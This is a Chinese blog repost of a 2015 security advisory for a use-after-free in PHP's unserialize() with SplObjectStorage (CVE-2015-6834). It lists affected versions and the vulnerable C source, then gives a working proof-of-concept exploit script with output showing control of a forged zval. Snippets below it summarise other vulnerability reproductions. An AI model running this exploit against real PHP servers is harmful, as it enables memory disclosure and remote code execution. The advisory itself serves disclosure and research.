php 重命名 漏洞,CVE-2015-6834

最新推荐文章于 2022-06-10 11:39:16 发布
最新推荐文章于 2022-06-10 11:39:16 发布
阅读量605 收藏
点赞数
文章标签: php 重命名 漏洞

Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage

Taoguang Chen

Write Date: 2015.8.27

Release Date: 2015.9.4

A use-after-free vulnerability was discovered in unserialize() with SplObjectStorage object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions

------------

Affected is PHP 5.6 < 5.6.13

Affected is PHP 5.5 < 5.5.29

Affected is PHP 5.4 < 5.4.45

Credits

------------

This vulnerability was disclosed by Taoguang Chen.

Description

------------

ALLOC_INIT_ZVAL(pentry);

if (!php_var_unserialize(&pentry, &p, s + buf_len, &var_hash TSRMLS_CC)) {

zval_ptr_dtor(&pentry);

goto outexcept;

}

if(Z_TYPE_P(pentry) != IS_OBJECT) {

goto outexcept;

}

ALLOC_INIT_ZVAL(pinf);

if (*p == ',') { /* new version has inf */

++p;

if (!php_var_unserialize(&pinf, &p, s + buf_len, &var_hash TSRMLS_CC)) {

zval_ptr_dtor(&pinf);

goto outexcept;

}

}

It has been demonstrated many times before that __wakeup() leads to

ZVAL is freed from memory. However during deserialization will still

allow to use R: or r: to set references to that already freed memory.

It is possible to use-after-free attack and execute arbitrary code

remotely.

Proof of Concept Exploit

------------

The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.

class obj {

var $ryat;

function __wakeup() {

$this->ryat = 1;

}

}

$fakezval = ptr2str(1122334455);

$fakezval .= ptr2str(0);

$fakezval .= "\x00\x00\x00\x00";

$fakezval .= "\x01";

$fakezval .= "\x00";

$fakezval .= "\x00\x00";

$inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}';

$exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';

$data = unserialize($exploit);

var_dump($data);

function ptr2str($ptr)

{

$out = '';

for ($i = 0; $i < 8; $i++) {

$out .= chr($ptr & 0xff);

$ptr >>= 8;

}

return $out;

}

?>

Test the PoC on the command line:

$ php uafpoc.php

array(5) {

[0]=>

int(1)

[1]=>

&int(1)

[2]=>

object(obj)#3 (1) {

["ryat"]=>

&int(1)

}

[3]=>

int(1122334455) <=== so we can control the memory and create fake ZVAL :)

[4]=>

string(24) "?v?B????"

}

YiZhou0307
关注
11-4 Apache换行解析漏洞CVE-2017-15715)
weixin_43263566的博客
11-25 1019
Apache換行解析漏洞CVE-2017-15715)是一种解析漏洞,可以影响httpd 2.4.0至2.4.29版本中的PHP解析。攻击者可以通过在上传的文件名中添加特定的换行符,绕过服务器的安全策略,使其被解析成PHP文件而不是普通文件。未正确配置的服务器未对文件名进行适当验证的服务器使用正则表达式并启用Multiline属性的服务器攻击者可以将1.php\x0A作为文件名上传到服务器上,这个文件名看起来像是一个普通的非PHP文件,但是由于其中的特定字符,服务器会将其解析为PHP文件。
WordPress插件File-Manager任意文件上传漏洞复现(CVE-2020-25213)
千寻的博客
01-26 1904
文章目录漏洞名称漏洞编号插件介绍漏洞描述影响版本实验环境及准备第一步 搭建wordpress第二步 下载插件,导入目录中第三步 查看漏洞点复现步骤第一步 安装模块 jq 模块第二步 检查漏洞是否存在第三步 访问上传的hello.php第四步 上传shell.php修复建议参考链接摘抄 漏洞名称 WordPress的插件 wp-file-manager 文件上传漏洞 漏洞编号 CVE-2020-25213 插件介绍 WP-file-manager是一个旨在帮助WordPress管理员管理其站点上的文
浅析CVE-2015-3636
少仲
08-09 5839
/* author:少仲 blog:http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3636
php5.28安装包下载,PHP 5.4.44/5.5.28/5.6.12 发布下载
weixin_29188043的博客
03-09 362
PHP 发布了三个更新版本,分别是 5.4.44 、5.5.28 和 5.6.12,这三个版本主要是安全方面的更新,详细内容请看 ChangeLog。Version 5.6.1206 Aug 2015Core:Fixed bug #70012 (Exception lost with nested finally block).Fixed bug #70002 (TS issues with te...
DNS域传送漏洞CVE-2015-5254)
Kevin's Blog
07-16 991
一、漏洞原理   DNS协议支持使用AXFR类型的记录进行区域传送,用来解决主从同步问题,如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。 (AXFR(完全区域传输),为了为新的服务器添加到网络配置为现有区域的新辅助服务器时,进行从主要区域中复制和同步所有区域副本,来保证解析名称查询时的可用性和容错。) 二、测试方法 方法一: /# 使用dig命令发送d...
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2916
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ 反序列化漏洞CVE-2015-5254)复现
糖小喵
04-12 335
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...
VMware vCenter Server远程代码执行漏洞复现 CVE-2021-21972
Ms08067安全实验室
08-18 1万+
文章来源|MS08067安全实验室本文作者:Taoing(WEB高级攻防班讲师)0x00 漏洞描述CVE-2021-21972 vmware vcenter的一个未任意位置,然后执行web...
CuppaCMS 文件上传漏洞复现(CVE-2020-26048)
玄道的网安博客
12-18 2557
0X00简介 CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。 0X01影响范围 CuppaCMS全版 0X02漏洞复现 在File Mangager功能中的rename功能是通过前端js进行的,导致rename功能可以,抓包绕过,改为.php后缀,导致webshell \js\filema
漏洞分析:WordPress 5.0 RCE(CVE-2019-6977)
DigApis的博客
02-21 1938
漏洞通过路径遍历和本地文件包含漏洞的组合实现WorePress核心中的远程代码执行,据漏洞发布者ripstech透露,此漏洞已在WordPress核心中存在6年以上。 权限需求 author及以上权限,相对来说,权限需求不算高,很多小型协作内容输出小社区诸如乐谱站会较为常用wordpress,而后给予普通作者author权限。 影响范围 因WordPress 4.9.9和5.0.1其他安全补丁所...
CVE-2015-1805漏洞验证
05-17
用于验证CVE-2015-1805漏洞,该漏洞攻击将导致部分手机出现崩溃重启和提权
cve-2015-3306复现
Yale的博客
04-02 3394
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
CVE-2015-1635(MS15-034 )远程代码执行漏洞复现
热门推荐
m0_37638874的博客
06-10 2万+
  1 漏洞背景   2 漏洞影响   3 漏洞利用     3.1 服务器配置与搭建     3.2 测试       3.2.1 curl命令       3.2.2 Host字段       3.2.3 Range字段     3.3 攻击利用   4 防御措施1 漏洞背景2 漏洞影响3 漏洞利用3.1 服务器配置与搭建win7我们如何开启iis服务呢控制面板>程序和功能>打开或关闭windows功能>Internet信息服务>勾选Web管理工具和万维网服务 我们访问一下 如上所示证明开启了iis服
ActiveMQ反序列化漏洞CVE-2015-5254)复现
weixin_45720618的博客
01-29 337
ActiveMQ反序列化漏洞CVE-2015-5254)复现前言基础知识漏洞原理适用版本复现过程 前言 靶场使用的vulhub 靶机:192.168.44.128 kali :192.168.44.129 基础知识 MQ(Message Queue):消息队列。消息服务将消息放在队列中,在合适的时候发给接收者。发送和接收是异步的(发送者和接收者的生命周期没有必然关系)。 漏洞原理 该漏洞由于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS
CVE-2015-1635,MS15-034 漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-12 480
靶机环境: Windows Server 2012 R2 IIS 7 下载链接:ed2k://|file|cn_windows_server_2012_x64_dvd_915588.iso|3826081792|6A56281311F9FE6973F66CF36E2F50BE|/ 激活密钥:J7TJK-NQPGQ-Q7VRH-G3B93-2WCQD POC #coding=utf-8 #CVE-2015-1635,MS15-034 import requests def main(target):
php pattern.test,PHP 5.6.38 make test 结果有49个测试失败,需要忽略吗?
weixin_30017913的博客
03-19 238
这是运行make test后的测试报告:=====================================================================TIME END 2018-11-22 02:51:55=====================================================================TEST RESULT SU...
php test —CentOS7— 编译 PHP
张同光 (Tongguang Zhang):Hello everyone !
02-01 2152
[root@localhost php-5.6.14]# ./configure --with-apxs2=/usr/bin/apxs --with-config-file-path=/etc --enable-cli --enable-shared --with-libxml-dir --enable-xml --with-gd --enable-gd-native-ttf --with-ope
php 漏洞 怎么解决,php安全漏洞怎么修复?
weixin_39869693的博客
03-09 3879
该楼层疑似违规已被系统折叠隐藏此楼查看此楼PHP PHAR扩展安全漏洞(CVE-2016-4072)PHPphp_filter_encode_url’函数整数溢出漏洞(CVE-2016-4345)PHP ‘str_pad’函数整数溢出漏洞(CVE-2016-4346)PHP‘wddx_stack_destroy’函数释放后重用漏洞(CVE-2016-7413)PHP Calendar...
CVE-2015-7547漏洞分析从原因到利用到补丁(非常适合小白)
u012406115的博客
05-15 9594
一、         漏洞概述 CVE漏洞链接:http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547 披露/发现时间:2015-07-13    提交时间:2016-02-17 漏洞等级:高  漏洞类别 缓冲区溢出 漏洞概述:该漏洞是Glibc中的DNS解析器中存在基于栈的缓冲区溢出漏洞,glibc是GNU发布的li
Python漏洞cve-2015-20107
最新发布
06-07
对于Python来说,CVE-2015-20107漏洞实际上是一个与Python中subprocess模块相关的漏洞。具体来说,当使用Python的subprocess模块执行命令时,如果存在特定的情况,攻击者可以通过构造特定的命令参数来执行恶意代码。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值